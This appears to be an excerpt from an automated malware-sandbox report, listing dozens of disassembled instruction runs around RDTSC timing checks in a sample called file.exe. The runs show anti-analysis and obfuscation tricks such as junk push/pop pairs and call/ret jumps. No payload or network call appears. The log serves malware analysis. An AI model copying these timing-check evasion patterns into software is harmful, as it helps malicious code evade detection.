Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F528 second address: 51F536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnl 00007F075CBABEC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51F536 second address: 51F53B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51FAD4 second address: 51FB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F075CBABECDh 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F075CBABEC8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F075CBABED8h 0x00000019 jno 00007F075CBABEC6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5204E4 second address: 5204E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5204E9 second address: 520503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F075CBABEC6h 0x0000000a popad 0x0000000b push ecx 0x0000000c jg 00007F075CBABEC6h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520503 second address: 520507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 520507 second address: 52050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5239C2 second address: 5239C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5239C8 second address: 5239CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 523B4C second address: 523B50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 523D8D second address: 523DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F075CBABECAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 524DE6 second address: 524E02 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F075D128F07h 0x00000008 jmp 00007F075D128F01h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EDB5E second address: 4EDB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EDB62 second address: 4EDB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CFCB second address: 52CFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CFCF second address: 52CFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E1DBA second address: 4E1DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F075CBABED7h 0x0000000a pop edi 0x0000000b js 00007F075CBABEEDh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C428 second address: 52C43B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C43B second address: 52C43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CAF2 second address: 52CB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F075D128EF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CB03 second address: 52CB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CB09 second address: 52CB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CCA3 second address: 52CCA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CCA8 second address: 52CCAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CCAE second address: 52CCB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CE19 second address: 52CE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52CE1D second address: 52CE21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F18E second address: 52F195 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52F500 second address: 52F514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FAA0 second address: 52FAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FAA4 second address: 52FAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F075CBABECDh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e xor edi, dword ptr [ebp+122D2661h] 0x00000014 movsx edi, si 0x00000017 push eax 0x00000018 pushad 0x00000019 jnc 00007F075CBABEC8h 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FB94 second address: 52FBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075D128F03h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FD0B second address: 52FD40 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075CBABED2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F075CBABED5h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE61 second address: 52FE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE65 second address: 52FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE6B second address: 52FE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52FE71 second address: 52FE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300F5 second address: 5300FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300FB second address: 530116 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F075CBABEC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D35FEh] 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 530116 second address: 53011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53011A second address: 530144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F075CBABECEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53070B second address: 530711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531138 second address: 531185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F075CBABECFh 0x00000008 jl 00007F075CBABEC6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 sub edi, 36B458A0h 0x00000018 push 00000000h 0x0000001a mov esi, dword ptr [ebp+122D28E6h] 0x00000020 push 00000000h 0x00000022 movzx edi, ax 0x00000025 push esi 0x00000026 mov dword ptr [ebp+122D1CCFh], edi 0x0000002c pop edi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F075CBABED3h 0x00000036 jmp 00007F075CBABECDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 531185 second address: 53118B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5322D8 second address: 5322DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5338EC second address: 5338F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534382 second address: 534390 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534390 second address: 534394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534394 second address: 5343AA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F075CBABECCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5343AA second address: 5343AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534DBD second address: 534DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534DC7 second address: 534DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534DCD second address: 534E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D239Fh], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F075CBABEC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F075CBABEC8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Bh 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 jnl 00007F075CBABECCh 0x0000004d mov edi, dword ptr [ebp+122D38FEh] 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 jnp 00007F075CBABEC6h 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534E41 second address: 534E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384BD second address: 5384C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384C1 second address: 5384C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384C7 second address: 5384CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5384CD second address: 5384D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A279 second address: 53A27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B24B second address: 53B255 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F075D128EFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A471 second address: 53A476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A476 second address: 53A47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53A47B second address: 53A481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C278 second address: 53C27D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B3FA second address: 53B425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F075CBABED7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D205 second address: 53D20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D20B second address: 53D20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53D20F second address: 53D224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jp 00007F075D128EF6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53E267 second address: 53E26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53E26D second address: 53E271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 540104 second address: 540108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 540108 second address: 54010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F453 second address: 53F477 instructions: 0x00000000 rdtsc 0x00000002 js 00007F075CBABEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F075CBABED6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54010E second address: 540188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F075D128EF8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 or ebx, dword ptr [ebp+12482338h] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F075D128EF8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jmp 00007F075D128F00h 0x0000004f mov ebx, edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pushad 0x00000056 popad 0x00000057 pop esi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F477 second address: 53F47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F47D second address: 53F481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53F481 second address: 53F485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 543FBD second address: 543FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F05h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 543FD6 second address: 543FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 543FE2 second address: 543FFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 jl 00007F075D128EF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5445F9 second address: 5445FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 541121 second address: 541133 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F075D128EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5422AA second address: 5422B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5422B0 second address: 5422B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5422B5 second address: 5422BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F075CBABEC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548B5A second address: 548B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnp 00007F075D128EF6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54569C second address: 54574D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F075CBABEC8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d or dword ptr [ebp+122D1BE8h], ebx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sub dword ptr [ebp+122D258Ch], ecx 0x00000040 mov eax, dword ptr [ebp+122D0029h] 0x00000046 mov dword ptr [ebp+1246469Ah], esi 0x0000004c sub dword ptr [ebp+122D1ABCh], esi 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push eax 0x00000057 call 00007F075CBABEC8h 0x0000005c pop eax 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 add dword ptr [esp+04h], 0000001Ah 0x00000069 inc eax 0x0000006a push eax 0x0000006b ret 0x0000006c pop eax 0x0000006d ret 0x0000006e call 00007F075CBABED7h 0x00000073 add dword ptr [ebp+1247BF40h], eax 0x00000079 pop edi 0x0000007a add di, 5550h 0x0000007f nop 0x00000080 pushad 0x00000081 pushad 0x00000082 push edi 0x00000083 pop edi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549A74 second address: 549ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+122D1C09h] 0x0000000d stc 0x0000000e push 00000000h 0x00000010 adc ebx, 1B346E24h 0x00000016 push 00000000h 0x00000018 call 00007F075D128F06h 0x0000001d or bh, FFFFFFE0h 0x00000020 pop edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 jmp 00007F075D128F03h 0x0000002a pop esi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508D3 second address: 5508D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508D9 second address: 5508DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508DD second address: 5508E7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F075CBABEC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5508E7 second address: 5508F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 550A42 second address: 550A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F1289 second address: 4F12AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jne 00007F075D128EF6h 0x00000017 rdtsc
